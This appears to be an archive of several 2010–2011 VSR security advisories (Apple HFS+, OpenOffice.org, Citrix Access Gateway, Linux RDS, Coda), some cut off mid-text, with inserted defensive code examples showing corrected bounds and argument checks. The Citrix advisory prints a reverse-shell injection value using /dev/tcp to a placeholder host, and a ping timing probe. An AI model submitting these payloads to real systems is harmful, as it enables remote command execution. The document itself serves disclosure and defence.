   ESX          3.5       ESX       ESX350-201105406-SG*
   ESX          3.0.3     ESX       not affected

The open-vm-tools package prior to version 2011.02.23-368700 is also affected.

Vendor Response
---
The following timeline details VMware's response to the reported issue:

2011-02-17    VMware receives initial vulnerability report
2011-02-17    VMware security team acknowledges receipt
2011-03-04    VMware provides status update
2011-03-04    VSR initiates discussion of disclosure date
2011-03-10    VMware responds, indicates internal coordination underway
2011-03-11    VSR

Apple HFS+ Information Disclosure Vulnerability

2011-03-22 Thread VSR Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


 VSR Security Advisory
   http://www.vsecurity.com/

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Advisory Name: Apple HFS+ Information Disclosure Vulnerability
 Release Date: 2011-03-22
  Application: Apple OS X kernel (XNU)
     Versions: All versions <= xnu-1504.7.4
 Severity: Medium
   Author: Dan Rosenberg drosenberg (at) vsecurity (dot) com 
Vendor Status: Patch Released [2]
CVE Candidate: CVE-2011-0180
Reference: http://www.vsecurity.com/resources/advisory/20110322-1/

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


Product Description
---
From [1]:

 Beneath the appealing, easy-to-use interface of Mac OS X is a rock-solid,
  UNIX-based foundation that is engineered for stability, reliability, and
  performance.  The kernel environment is built on top of Mach 3.0 and provides
  high-performance networking facilities and support for multiple, integrated
  file systems.


Vulnerability Overview
--

On June 30th, VSR identified a vulnerability in HFS+, a filesystem implemented
in the OS X XNU kernel.  HFS+ is the default filesystem in use on many
installations of the Mac OS X operating system.  By exploiting this
vulnerability, an unprivileged user with local access to a machine using HFS+
may be able to read raw filesystem data, bypassing file permissions and
resulting in information disclosure.


Vulnerability Details
-

Users may interact with the filesystem using the standard ioctl interface.
HFS+ features an ioctl called F_READBOOTSTRAP that allows unprivileged users to
read raw data from an HFS+ filesystem.  The ioctl intends to ensure that this
data is restricted to the first 1024 bytes, where bootstrap information is
stored.  However, due to an integer overflow in the code that attempts to
enforce this restriction, it is possible for an unprivileged user to use this
ioctl to read large portions of filesystem data outside of this byte range,
leading to an information disclosure vulnerability.

The vulnerable check reads as follows, in bsd/hfs/hfs_readwrite.c:

    if (user_bootstrapp->fbt_offset + user_bootstrapp->fbt_length > 1024)
        return EINVAL;

If a user provides values for the fbt_offset and fbt_length members such that
their sum overflows and wraps around to an integer less than 1024, portions of
filesystem data outside the intended range will be read and returned to the
user.
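The check above and the way it wraps, as an added example that is not from the advisory or from the XNU source: the field width (32 bits) is an assumption made for the demonstration, as are the function names; the kernel's fields may be wider, but a check written as offset + length > LIMIT wraps the same way at any width.

```python
"""Added example (not from the VSR advisory or the XNU source): the
F_READBOOTSTRAP bounds check from the advisory modelled with fixed-width
unsigned arithmetic, next to a check that cannot be wrapped.

The field width is an assumption for the demonstration (32 bits); the kernel's
fields may be wider, but a check of the form `offset + length > LIMIT` wraps
the same way at any width, and a signed negative offset slips past it with no
wrap at all.
"""
BITS = 32
MASK = (1 << BITS) - 1
BOOTSTRAP_LIMIT = 1024          # bytes of bootstrap data the ioctl is meant to expose


def vulnerable_allows(fbt_offset, fbt_length):
    """`if (fbt_offset + fbt_length > 1024) return EINVAL;` with the sum computed
    modulo 2**BITS, as a fixed-width add does. True means the read proceeds."""
    return ((fbt_offset + fbt_length) & MASK) <= BOOTSTRAP_LIMIT


def safe_allows(fbt_offset, fbt_length):
    """Bound each operand before relating them, so no addition can overflow,
    and reject negative values outright."""
    if fbt_offset < 0 or fbt_length < 0:
        return False
    if fbt_offset > BOOTSTRAP_LIMIT or fbt_length > BOOTSTRAP_LIMIT:
        return False
    return fbt_length <= BOOTSTRAP_LIMIT - fbt_offset


def wrapping_length(fbt_offset):
    """Smallest length that makes offset + length wrap to exactly 0 (< 1024),
    i.e. the value that passes the vulnerable check for any offset."""
    return (-fbt_offset) & MASK


def bytes_actually_read(fbt_offset, fbt_length):
    """End of the range the read path would walk if the check were the only guard."""
    return fbt_offset + fbt_length


if __name__ == "__main__":
    off = 0x10000                    # 64 KiB into the volume, far past the bootstrap area
    ln = wrapping_length(off)
    print(f"offset={off:#x} length={ln:#x}: vulnerable check allows={vulnerable_allows(off, ln)}, "
          f"safe check allows={safe_allows(off, ln)}, "
          f"read would end at {bytes_actually_read(off, ln):#x}")
```

The hardened form never computes offset + length on the unchecked values; it compares each against the limit first and then compares length against the remaining room, which is the pattern to look for when reviewing any range check on user-supplied integers.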


Proof-of-Concept Exploit
--

VSR has developed a proof-of-concept exploit [3] to both demonstrate the
severity of this issue as well as allow users and administrators to verify the
existence of the vulnerability. The exploit leverages the integer overflow to
read arbitrary amounts of filesystem data at a negative offset from the end of
the filesystem.


Versions Affected
-
Testing was performed on Darwin Kernel Version 10.4.0, xnu-1504.7.4~1, but
review of older source code suggests that all versions of OS X may be affected.


Vendor Response
---
The following timeline details Apple's response to the reported issue:

2010-07-01    Apple was provided a draft advisory
2010-07-02    Apple acknowledges receipt of advisory
2010-07-22    Request for confirmation of issue
2010-07-25    Apple confirms issue under investigation
2010-09-02    Request for status update
2010-09-02    Apple confirms fix is being tested
2010-10-13    Request for status update
2010-10-14    Apple confirms fix is planned for undetermined date
2010-11-16    Request for status update
2010-11-16    Apple confirms ship date is set for early 2011
2011-01-18    Request for status update
2011-01-18    Apple confirms ship date for early April
2011-03-21    Apple publishes fix

Apple's advisory may be obtained at:
   http://support.apple.com/kb/HT4581


Recommendation
--
Apply the fix provided by Apple's OS X security update [2].


Common Vulnerabilities and Exposures (CVE) Information
--
The Common Vulnerabilities and Exposures (CVE) project has assigned
the number CVE-2011-0180 to this issue.  This is a candidate for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

References:

1. Darwin and Core Technologies
   http://developer.apple.com/mac/library/documentation/MacOSX/Conceptual/OSX_Technology_Overview/SystemTechnology/SystemTechnology.html

2. Apple Security Update 2011-001
   http://support.apple.com/kb/HT4581

3. HFS+ F_READBOOTSTRAP information disclosure exploit
   http://www.vsecurity.com/download/tools/hfs-dump.c

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

This advisory is distributed for educational 

OpenOffice.org Multiple Memory Corruption Vulnerabilities

2011-01-27 Thread VSR Advisories


 VSR Security Advisory
   http://www.vsecurity.com/

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 Advisory Name: OpenOffice.org Multiple Memory Corruption Vulnerabilities
  Release Date: 2011-01-26
   Application: Oracle OpenOffice.org
  Versions: 3.2 and earlier
  Severity: High
Author: Dan Rosenberg drosenberg (at) vsecurity.com
 Vendor Status: Patch Released
CVE Candidates: CVE-2010-3451, CVE-2010-3452, CVE-2010-3453, CVE-2010-3454
 Reference: http://www.vsecurity.com/resources/advisory/20110126-1/

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


Product Description
---
From [1]:

 OpenOffice.org 3 is the leading open-source office software suite for word
  processing, spreadsheets, presentations, graphics, databases and more.  It is
  available in many languages and works on all common computers.  It stores all
  your data in an international open standard format and can also read and write
  files from other common office software packages.  It can be downloaded and
  used completely free of charge for any purpose.

Vulnerability Overview
--
On August 20th, VSR identified multiple memory corruption vulnerabilities in
OpenOffice.org.  By convincing a victim to open a maliciously crafted RTF or
Word document, arbitrary code may be executed on the victim's machine.

Vulnerability Details
-

CVE-2010-3451:

OpenOffice.org uses its own internal memory management system for parsing
tables in RTF documents.  Information about each table row is inserted, element
by element, into an SwTableBoxes object.  These objects contain a fixed amount
of data, and when they have reached capacity, a resize() method is called to
double the space previously allocated for cell contents.  When this method is
called, the new space will be allocated on top of recently freed memory
containing file data without clearing this memory.  Because of a bug in the RTF
parser, corrupt table data may cause the insertion of elements into an
SwTableBoxes object to skip an index rather than remaining strictly sequential.
When this occurs, the nA field, representing the number of data elements used
in the object, will be out-of-sync with the index of the most recently inserted
element, allowing exploitation of a use-after-free vulnerability.

To exploit this issue, corrupt RTF table data first causes the nA field to
become out-of-sync with the index of the most recently inserted element in an
SwTableBoxes object.  Next, the resize() method is called when the object
reaches capacity, resulting in its data being reallocated on top of
attacker-controlled memory.  Finally, during the parsing of an RTF_ROW token,
the nA field is used to index into the SwTableBoxes cell data in an attempt to
retrieve the most recently added object.  Because this index is out-of-sync and
the data was recently moved on top of previously used memory, this will result
in retrieving an attacker-controlled object from the heap.  Subsequent usage of
this object may allow an attacker to control program flow and execute arbitrary
code.

CVE-2010-3452:

Due to a signedness error in parsing the \pnseclvl RTF tag, which is used for
multi-level lists, it is possible to trigger a use-after-free vulnerability.
When this tag is followed by an unexpected character, its token value may be
negative.  The parser attempts to restrict this value to less than the MAXLEVEL
constant, but since a signed comparison is used, a negative value will pass
this check.  This value is then used as an index to retrieve an SwNumFmt object
from an array on the heap.  By manipulating the heap, it is possible to cause
the retrieval of an attacker-controlled object.  Subsequent usage of this
object may allow an attacker to control program flow and execute arbitrary
code.

CVE-2010-3453:

When processing override level numbers in parsing list data for Word
documents, a user-controlled value is used to index into a vector for an
assignment without checking that this index is less than the size of the
vector.  As a result, an attacker-controlled object may be written to a
location on the heap past the bounds of the vector, potentially allowing
arbitrary code execution.

CVE-2010-3454:

When parsing Word documents, two signed short values are read directly from the
document file to determine where to place NULL terminators after copying
additional data in.  Because these indexes are not checked in any way, an
attacker may use this to write NULL bytes to two arbitrary locations in memory,
potentially allowing arbitrary code execution.
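The three index and offset checks described for CVE-2010-3452, CVE-2010-3453 and CVE-2010-3454, as an added C example that is not OpenOffice.org code: the predicate that reproduces the signed comparison, and the bounds checks the other two issues were missing. The MAXLEVEL value, the vector type and the buffer are constructed for the example.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Assumed value for the example; the advisory names the constant but not its value. */
#define MAXLEVEL 9

/* CVE-2010-3452 pattern: the \pnseclvl token value is a signed int and the only
 * guard is "less than MAXLEVEL".  A negative value satisfies it and then indexes
 * the SwNumFmt array, reading before its start. */
static bool level_index_ok_signed_compare(int level)
{
    return level < MAXLEVEL;            /* -1 < 9 is true: a negative index is accepted */
}

/* Corrected guard: non-negative and below the array size.  Casting to unsigned
 * before the comparison, (unsigned)level < MAXLEVEL, is the equivalent one-liner. */
static bool level_index_ok(int level)
{
    return level >= 0 && level < MAXLEVEL;
}

/* CVE-2010-3453 pattern: an override level number from the document indexes a
 * vector for assignment.  Constructed vector: items is the storage, size the
 * number of live elements, and only size bounds a valid index. */
typedef struct {
    void  *items[8];
    size_t size;
} ptr_vector;

static bool vector_assign(ptr_vector *v, size_t idx, void *obj)
{
    if (idx >= v->size)                 /* the missing check; idx == size is already past the end */
        return false;
    v->items[idx] = obj;
    return true;
}

/* CVE-2010-3454 pattern: two signed 16-bit values read from the file say where to
 * write NUL terminators after data has been copied into buf.  Both must fall
 * inside the buffer; a negative or oversized value is a write to an arbitrary address. */
static bool place_terminators(char *buf, size_t buflen, int16_t off1, int16_t off2)
{
    if (off1 < 0 || off2 < 0 || (size_t)off1 >= buflen || (size_t)off2 >= buflen)
        return false;
    buf[off1] = '\0';
    buf[off2] = '\0';
    return true;
}

/* Drivers over constructed inputs so the checks can be exercised without a parser. */
static bool sample_vector_assign(size_t idx)
{
    static int obj;
    ptr_vector v = { .items = {0}, .size = 2 };
    return vector_assign(&v, idx, &obj);
}

static bool sample_terminators(int16_t off1, int16_t off2)
{
    char buf[16] = {0};
    return place_terminators(buf, sizeof buf, off1, off2);
}

int main(void)
{
    printf("signed compare accepts level -1: %d  fixed check accepts it: %d\n",
           level_index_ok_signed_compare(-1), level_index_ok(-1));
    printf("assignment at index 2 of a 2-element vector accepted: %d\n",
           sample_vector_assign(2));
    printf("terminator offsets (-1, 7) in a 16-byte buffer accepted: %d\n",
           sample_terminators(-1, 7));
    return 0;
}
```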

Versions Affected
-----------------
Versions prior to OpenOffice.org 3.3 are affected.

Vendor Response
---------------
The following timeline details OpenOffice.org's response to the reported issues:

2010-08-20  Initial

VSR Advisories: Citrix Access Gateway Command Injection Vulnerability

2010-12-22 Thread VSR Advisories

 VSR Security Advisory
   http://www.vsecurity.com/

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Advisory Name: Citrix Access Gateway Command Injection Vulnerability
 Release Date: 2010-12-21
  Application: Citrix Access Gateway
 Versions: Access Gateway Enterprise Edition (up to 9.2-49.8)
   Access Gateway Standard & Advanced Edition (prior to 5.0)
 Severity: High
   Author: George D. Gal ggal (at) vsecurity (dot) com
Vendor Status: Updated Software Released, NT4 Authentication Removed [2]
CVE Candidate: CVE-2010-4566
Reference: http://www.vsecurity.com/resources/advisory/20101221-1/

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


Product Description
-------------------
From [1]:

 Citrix(R) Access Gateway(TM) is a secure application access solution that
  provides administrators granular application-level control while
  empowering users with remote access from anywhere. It gives IT
  administrators a single point to manage access control and limit actions
  within sessions based on both user identity and the endpoint device,
  providing better application security, data protection, and compliance
  management.

Vulnerability Overview
----------------------

On August 2nd, VSR identified a vulnerability in Citrix Access Gateway within
the way user authentication credentials are handled.  Under certain
configuration settings it appears that user credentials are passed as
arguments to a command line program to authenticate the user. A lack of data
validation and the mechanism in which the external program is spawned results
in the potential for command injection and arbitrary command execution on the
Access Gateway.

Vulnerability Details
---------------------

The Citrix Access Gateway provides support for multiple authentication types.
When utilizing the external legacy NTLM authentication module known as
ntlm_authenticator the Access Gateway spawns the Samba 'samedit' command
line utility to verify a user's identity and password.  By embedding shell
metacharacters in the web authentication form it is possible to execute
arbitrary commands on the Access Gateway.

The following commands are executed by the ntlm_authenticator during this
process:

 vpnadmin 10130  0.0  0.0  2104  976 ?        S    15:02   0:00 sh -c
 /usr/local/samba/bin/samedit -c 'samuser username -a' -U
 username%password -p 139 -S xxx.xxx.xxx.xxx >
 /tmp/samedit-samuser-stdout.50474096 2> /dev/null

 vpnadmin 10131  0.0  0.1  3852 1528 ?        S    15:02   0:00
 /usr/local/samba/bin/samedit -c samuser username -a -U username% -p
 139 -S xxx.xxx.xxx.xxx

By submitting a password value as shown below, it is possible to establish a
reverse shell to a netcat listener:

 | bash -i >& /dev/tcp/HOST/PORT 0>&1

Using a simple ping command in the password field an attacker could use timing
attacks to verify the presence of the vulnerability:

 | ping -c 10 HOST

The ping command above will attempt to send 10 ICMP echo requests to the
target host, resulting in a noticeable delay easily detected by vulnerability
scanners.
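What a correctly built authenticator call looks like, as an added C example that is not Citrix's or Samba's code: the samedit arguments from the process listing above are passed as an argv vector so no shell ever parses the password, with an input validator and a metacharacter detector for logging. The argument layout follows the listing; buffer sizes, the allowed username alphabet and the sample values are assumptions.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

#define SAMEDIT "/usr/local/samba/bin/samedit"   /* path from the process listing above */

typedef struct {
    char  cmd[256];      /* "samuser <user> -a" */
    char  cred[512];     /* "<user>%<password>" */
    char *argv[10];
    int   argc;
} samedit_call;

/* The username is embedded in the -c subcommand that samedit itself tokenises,
 * so restrict it to a conservative alphabet (an assumption for the example). */
static bool valid_username(const char *user)
{
    if (*user == '\0' || strlen(user) > 64)
        return false;
    for (const char *p = user; *p; p++)
        if (!isalnum((unsigned char)*p) && strchr("._-", *p) == NULL)
            return false;
    return true;
}

/* Detector for logging and alerting: characters sh -c treats specially.  The
 * password must never reach a shell regardless; this only makes abuse visible. */
static bool has_shell_metachars(const char *s)
{
    return strpbrk(s, "|&;<>`$(){}\r\n") != NULL;
}

/* Build the samedit invocation as an argv vector.  Every value is a single
 * element, so a password such as "| ping -c 10 HOST" reaches samedit as data.
 * Returns argc, or -1 if an input is rejected or does not fit. */
static int build_samedit_argv(samedit_call *c, const char *user, const char *pass, const char *dc)
{
    if (!valid_username(user))
        return -1;
    if (snprintf(c->cmd, sizeof c->cmd, "samuser %s -a", user) >= (int)sizeof c->cmd)
        return -1;
    if (snprintf(c->cred, sizeof c->cred, "%s%%%s", user, pass) >= (int)sizeof c->cred)
        return -1;
    int n = 0;
    c->argv[n++] = SAMEDIT;
    c->argv[n++] = "-c";  c->argv[n++] = c->cmd;
    c->argv[n++] = "-U";  c->argv[n++] = c->cred;
    c->argv[n++] = "-p";  c->argv[n++] = "139";
    c->argv[n++] = "-S";  c->argv[n++] = (char *)dc;
    c->argv[n] = NULL;
    c->argc = n;
    return n;
}

/* Execute without a shell: execv() hands the vector over unchanged.
 * Returns the child's exit status, or -1 on failure. */
static int run_samedit(const samedit_call *c)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execv(c->argv[0], c->argv);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Constructed sample: the timing-probe password quoted in the advisory, sent
 * towards a documentation-range domain controller address. */
static bool sample_password_is_one_argument(void)
{
    samedit_call c;
    if (build_samedit_argv(&c, "alice", "| ping -c 10 HOST", "192.0.2.10") != 9)
        return false;
    return strcmp(c.argv[4], "alice%| ping -c 10 HOST") == 0;
}

int main(void)
{
    samedit_call c;
    if (build_samedit_argv(&c, "alice", "| ping -c 10 HOST", "192.0.2.10") < 0)
        return 1;
    for (int i = 0; i < c.argc; i++)
        printf("argv[%d] = [%s]\n", i, c.argv[i]);   /* the password stays inside argv[4] */
    (void)run_samedit;                                /* not invoked here: samedit is not installed in the demo */
    return 0;
}
```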

Versions Affected
-----------------
Testing was performed against a Citrix Access Gateway 2000 version 4.5.7.
According to the vendor this vulnerability affects all versions of Access
Gateway Enterprise Edition up to version 9.2-49.8, and all versions of
the Access Gateway Standard and Advanced Editions prior to Access Gateway
5.0.

Vendor Response
---------------
The following timeline details the vendor's response to the reported issue:

2010-08-06  Citrix was provided a draft advisory.
2010-08-10  Citrix acknowledged receipt of draft advisory.
2010-08-16  VSR follow-up to determine confirmation of issue.
2010-08-16  Citrix confirmed issue.
2010-09-14  VSR follow-up to determine status of issue.
2010-09-29  VSR follow-up to determine status of issue.
2010-09-30  Citrix confirmed continued investigation of the issue.
2010-10-19  VSR follow-up to determine status of issue.
2010-10-26  Citrix verified issue only exists in NT4 authentication feature.
2010-12-01  VSR follow-up to determine status of issue.
2010-12-02  Citrix confirmed December 14th release of security bulletin.
2010-12-14  Citrix releases security bulletin.
2010-12-20  CVE assigned
2010-12-21  VSR releases advisory.


The Citrix advisory may be obtained at:
  http://support.citrix.com/article/CTX127613

Recommendation
--------------
Citrix has indicated that this vulnerability only affects legacy NT4
authentication which has been removed from the latest release of the
device firmware.

Common Vulnerabilities and Exposures (CVE) Information
------------------------------------------------------
The Common Vulnerabilities and Exposures (CVE) project has assigned
the number CVE-2010-4566 to this issue.  This is a candidate for
inclusion in the CVE list (http://cve.mitre.org), which standardizes

VSR Advisories: Linux RDS Protocol Local Privilege Escalation

2010-10-19 Thread VSR Advisories

 VSR Security Advisory
   http://www.vsecurity.com/

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Advisory Name: Linux RDS Protocol Local Privilege Escalation
 Release Date: 2010-10-19
  Application: Linux Kernel
 Versions: 2.6.30 - 2.6.36-rc8
 Severity: High
   Author: Dan Rosenberg  drosenberg (at) vsecurity (dot) com 
Vendor Status: Patch Released [3]
CVE Candidate: CVE-2010-3904
Reference: http://www.vsecurity.com/resources/advisory/20101019-1/

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


Product Description
-------------------
From [1]:

 Linux is a free Unix-type operating system originally created by Linus
  Torvalds with the assistance of developers around the world. Developed under
  the GNU General Public License, the source code for Linux is freely available
  to everyone.

From [2]:

 Reliable Datagram Sockets (RDS) provide in order, non-duplicating, 
  highly available, low overhead, reliable delivery of datagrams between 
  hundreds of thousands of non-connected endpoints.

Vulnerability Overview
----------------------
On October 13th, VSR identified a vulnerability in the RDS protocol, as
implemented in the Linux kernel.  Because kernel functions responsible for
copying data between kernel and user space failed to verify that a
user-provided address actually resided in the user segment, a local attacker
could issue specially crafted socket function calls to write arbitrary values
into kernel memory.  By leveraging this capability, it is possible for
unprivileged users to escalate privileges to root.

Vulnerability Details
---------------------
On Linux, recvmsg() style socket calls are performed using iovec structs, which
allow a user to specify a base address and size for a buffer used to receive
socket data.  Each packet family is responsible for defining functions that
copy socket data, which is received by the kernel, back to user space to allow
user programs to process and handle received network data.

When performing this copying of data to user space, the RDS protocol failed to
verify that the base address of a user-provided iovec struct pointed to a valid
userspace address before using the __copy_to_user_inatomic() function to copy
the data.  As a result, by providing a kernel address as an iovec base and
issuing a recvmsg() style socket call, a local user could write arbitrary data
into kernel memory.  This can be leveraged to escalate privileges to root.
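The missing check, modelled as an added C example that is not kernel code: before any byte is copied, every iovec the caller supplied must lie wholly within user space and its end must not wrap around. The user/kernel boundary, the socket function and a 64-bit build are assumptions standing in for the kernel's access_ok() logic and recvmsg() path; nothing is written to the addresses here.

```c
#include <errno.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Assumed boundary for the model: addresses at or above this are kernel space.
 * The kernel's own value comes from TASK_SIZE_MAX / access_ok(); this is for the example. */
#define USER_END ((uintptr_t)0x0000800000000000ULL)

typedef struct {
    uintptr_t iov_base;   /* buffer address supplied by the recvmsg() caller */
    size_t    iov_len;
} iovec_model;

/* The validation RDS skipped before __copy_to_user_inatomic(): the range
 * [base, base + len) must fit below USER_END.  The comparison is written as a
 * subtraction so that a huge len cannot wrap base + len around to a small value. */
static bool user_range_ok(uintptr_t base, size_t len)
{
    if (len > USER_END)             /* cannot fit anywhere in user space */
        return false;
    if (base > USER_END - len)      /* end would cross the boundary (or wrap) */
        return false;
    return true;
}

/* Modelled receive path: refuse the whole call with -EFAULT if any iovec falls
 * outside user space, otherwise report how many of the `available` bytes would
 * be delivered.  The copy itself is deliberately left out of the model. */
static long model_recvmsg(const iovec_model *iov, size_t niov, size_t available)
{
    size_t total = 0;
    for (size_t i = 0; i < niov; i++) {
        if (!user_range_ok(iov[i].iov_base, iov[i].iov_len))
            return -EFAULT;
        if (iov[i].iov_len > SIZE_MAX - total)
            return -EINVAL;
        total += iov[i].iov_len;
    }
    return (long)(total < available ? total : available);
}

/* Constructed vectors: an ordinary user buffer, one aimed at a kernel address
 * (the shape of the attack described above), and one whose end wraps around. */
static long sample_user_buffer(void)
{
    iovec_model v = { 0x00007f12345000ULL, 4096 };
    return model_recvmsg(&v, 1, 100);
}

static long sample_kernel_target(void)
{
    iovec_model v = { 0xffffffff81a00000ULL, 8 };
    return model_recvmsg(&v, 1, 100);
}

static long sample_wraparound(void)
{
    iovec_model v = { UINTPTR_MAX - 4, 16 };   /* base + len wraps to 11, which a naive "end <= USER_END" would accept */
    return model_recvmsg(&v, 1, 100);
}

int main(void)
{
    printf("user buffer:   %ld\n", sample_user_buffer());    /* 100 */
    printf("kernel target: %ld\n", sample_kernel_target());  /* -EFAULT */
    printf("wrap-around:   %ld\n", sample_wraparound());     /* -EFAULT */
    return 0;
}
```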

Proof-of-Concept Exploit
------------------------
VSR has developed a proof-of-concept exploit [4] to both demonstrate the
severity of this issue as well as allow users and administrators to verify the
existence of the vulnerability.  The exploit leverages the ability to write
into kernel memory to reset the kernel's security operations structure and gain
root privileges.  The exploit requires that kernel symbol resolution is
available to unprivileged users, via /proc/kallsyms or similar, as is the case
on most stock distributions.  It has been tested on both 32-bit and 64-bit x86
platforms.  While this exploit has been reliable during testing, it is not
advised to run kernel exploits on production systems, as there is a risk of
causing system instability and crashing the affected machine.

Versions Affected
-----------------
This vulnerability affects unpatched versions of the Linux kernel, starting
from 2.6.30, where the RDS protocol was first included.  Installations are only
vulnerable if the CONFIG_RDS kernel configuration option is set, and if there
are no restrictions on unprivileged users loading packet family modules, as is
the case on most stock distributions.

Vendor Response
---------------
The following timeline details Linux's response to the reported issue.

2010-10-13  Vulnerability reported to Linux security team
2010-10-13  Response, agreement on disclosure date
2010-10-19  Fix publicly committed [3]
2010-10-19  Coordinated disclosure

Recommendation
--------------
Users should either install updates provided by downstream distributions, or
apply the committed patch [3] and recompile their kernel.

Common Vulnerabilities and Exposures (CVE) Information
------------------------------------------------------
The Common Vulnerabilities and Exposures (CVE) project has assigned
the number CVE-2010-3904 to this issue.  This is a candidate for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.

Acknowledgements
----------------
Thanks to Andrew Morton, Linus Torvalds, Andy Grover, and Eugene Teo for their
prompt responses and patch.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

References:

1. Linux kernel 
 http://www.linux.org

2. Reliable Datagram Sockets
 

CVE-2010-3014: Coda Filesystem Kernel Memory Disclosure

2010-08-16 Thread VSR Advisories

 VSR Security Advisory
   http://www.vsecurity.com/

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Advisory Name: Coda Filesystem Kernel Memory Disclosure
 Release Date: 2010-08-16
  Application: Coda kernel module for NetBSD and FreeBSD
 Versions: All known versions
 Severity: Medium
   Author: Dan Rosenberg  drosenberg (at) vsecurity (dot) com 
Vendor Status: Patch Released [2][3]
CVE Candidate: CVE-2010-3014
Reference: http://www.vsecurity.com/resources/advisory/20100816-1/

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


Product Description
-------------------
From [1]:

 Coda is a distributed filesystem with its origin in AFS2.  It has many
 features that are very desirable for network filesystems.  Currently, Coda has
 several features not found elsewhere.

   1. disconnected operation for mobile computing
   2. is freely available under a liberal license
   3. high performance through client side persistent caching
   4. server replication
   5. security model for authentication, encryption and access control
   6. continued operation during partial network failures in server network
   7. network bandwidth adaptation
   8. good scalability
   9. well defined semantics of sharing, even in the presence of network failure


Vulnerability Overview
----------------------
On July 19th, VSR identified a vulnerability in the Coda filesystem kernel
module, as implemented for FreeBSD and NetBSD.  By sending a specially crafted
ioctl request to a mounted Coda filesystem, an unprivileged local user could
read large portions of kernel heap memory, leading to the disclosure of
potentially sensitive information.


Product Background
------------------
Coda is implemented as a kernel filesystem module with userland components.
System calls involving file I/O are passed to the Coda kernel module, which in
turn passes the request to the userland Venus cache manager via a character
device.  Venus answers the request by checking its cache or requesting content
from the Coda server.  Coda implements most standard filesystem operations,
including providing an ioctl interface. 


Vulnerability Details
---------------------
Coda ioctls are passed through the Coda filesystem module before being sent to
Venus.  The arguments to a Coda ioctl are encapsulated in a PioctlData struct,
which in turn contains a ViceIoctl struct.  The ViceIoctl struct contains
in_size and out_size fields, dictating the expected size of the input and
output data corresponding to a particular ioctl request.  The in_size field
is validated to prevent memory corruption via copying an unexpected amount of
data from userspace into a kernel buffer.  

However, the out_size field was missing this validation.  When copying the
output data of an ioctl request back to userspace, the out_size field was
used to determine the amount of data to copy, without restricting it to a
maximum possible size.  By specifying a large value for this field, the
contents of the kernel heap beyond the data intended to be returned to the user
would be copied into a userland buffer.  An unprivileged user could exploit
this to read large portions of the kernel heap, potentially disclosing
sensitive information.
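The effect of the unchecked out_size and the clamp that prevents it, as an added C example that is not Coda, FreeBSD or NetBSD code. The struct field names follow the advisory; the heap layout, the maximum size constant and the reply contents are constructed.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define VC_MAXDATASIZE 8192    /* assumed upper bound on any ioctl payload in this model */

/* Layout modelled on the ViceIoctl struct named above. */
struct vice_ioctl {
    void    *in;
    void    *out;
    uint16_t in_size;
    uint16_t out_size;
};

/* Constructed kernel heap region: the reply Venus produced sits at the front and
 * whatever the allocator placed next (here, data an unprivileged user must never
 * see) follows immediately.  Only reply_len bytes belong to this request. */
static const char   kernel_heap[64] = "reply-data-1234\0SECRET-KERNEL-DATA-FROM-NEIGHBOUR";
static const size_t reply_len       = 15;

/* Vulnerable copy-out: out_size from user space decides the length.  The copy is
 * capped at the model's heap size only so the example stays memory-safe; the
 * real code had no bound at all. */
static long copyout_vulnerable(const struct vice_ioctl *vi, char *user, size_t user_cap)
{
    size_t n = vi->out_size;
    if (n > sizeof kernel_heap) n = sizeof kernel_heap;
    if (n > user_cap)           n = user_cap;
    memcpy(user, kernel_heap, n);
    return (long)n;
}

/* Fixed copy-out: reject absurd sizes up front, then never copy more than the
 * reply actually contains. */
static long copyout_fixed(const struct vice_ioctl *vi, char *user, size_t user_cap)
{
    if (vi->out_size > VC_MAXDATASIZE)
        return -1;                          /* -EINVAL in a kernel */
    size_t n = vi->out_size;
    if (n > reply_len) n = reply_len;       /* clamp to the data meant for the caller */
    if (n > user_cap)  n = user_cap;
    memcpy(user, kernel_heap, n);
    return (long)n;
}

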